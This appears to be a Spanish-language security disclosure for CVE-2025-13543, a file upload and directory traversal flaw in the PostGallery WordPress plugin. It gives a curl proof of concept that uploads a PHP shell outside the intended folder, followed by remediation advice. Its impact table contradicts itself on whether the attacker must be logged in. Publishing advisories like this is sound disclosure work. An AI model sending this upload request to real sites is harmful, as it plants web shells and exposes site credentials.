
Divulgación de CVE-2025-13543
Divulgación para CVE-2025-13543
Este repositorio divulga una vulnerabilidad descubierta en PostGallery <= 1.12.5, un plugin de WordPress desarrollado por rtowebsites.
| CVE ID | Tipo | Componente | Impacto |
|---|---|---|---|
| CVE-2025-13543 | Subida arbitraria de archivos autenticada (Suscriptor+) | lib/ajax-actions/imageUpload.php admin/PostGalleryUploader.php | Un atacante no autenticado puede subir un archivo arbitrario |
postgalleryAjaxUpload) y backend de PostGalleryUploadercurl -k -X POST "http://localhost:8080/wp-admin/admin-ajax.php" \
-H "Cookie: wordpress_logged_in_<hash>=<your_cookie>" \
-F "action=postgalleryAjaxUpload" \
-F "postid=1" \
-F "uploadFolder=../../../" \
-F "name=shell.php" \
-F "[email protected];type=application/x-php"
wp-config.php y credenciales de la base de datos, el despliegue de puertas traseras persistentes y la creación de cuentas de administrador maliciosas.lib/ajax-actions/imageUpload.php, aplicar una autorización adecuada (por ejemplo, requerir current_user_can('upload_files')) y validar un nonce criptográfico antes de procesar las subidas.admin/PostGalleryUploader.php, restringir estrictamente uploadFolder a un subdirectorio conocido de wp-content/uploads/gallery, rechazar cualquier valor que contenga ../ o rutas absolutas, y normalizar las rutas antes de usarlas.wp_handle_upload() / wp_check_filetype_and_ext() y restringir las subidas a una lista blanca de tipos de medios no ejecutables, bloqueando explícitamente .php y otras extensiones ejecutables en directorios accesibles por web.Pensé... ¿cómo puede existir una vulnerabilidad como esta, digna de un CTF? Ya solo la subida arbitraria de archivos es grave, pero tener además un directory traversal es desolador. Fue muy divertido reproducir la vulnerabilidad.
Nombre: MooseLove
Rol: Investigador de seguridad independiente / bug hunter
Contacto: Disponible bajo solicitud
Este aviso se proporciona para concienciación pública sobre seguridad. Libre para compartir con atribución.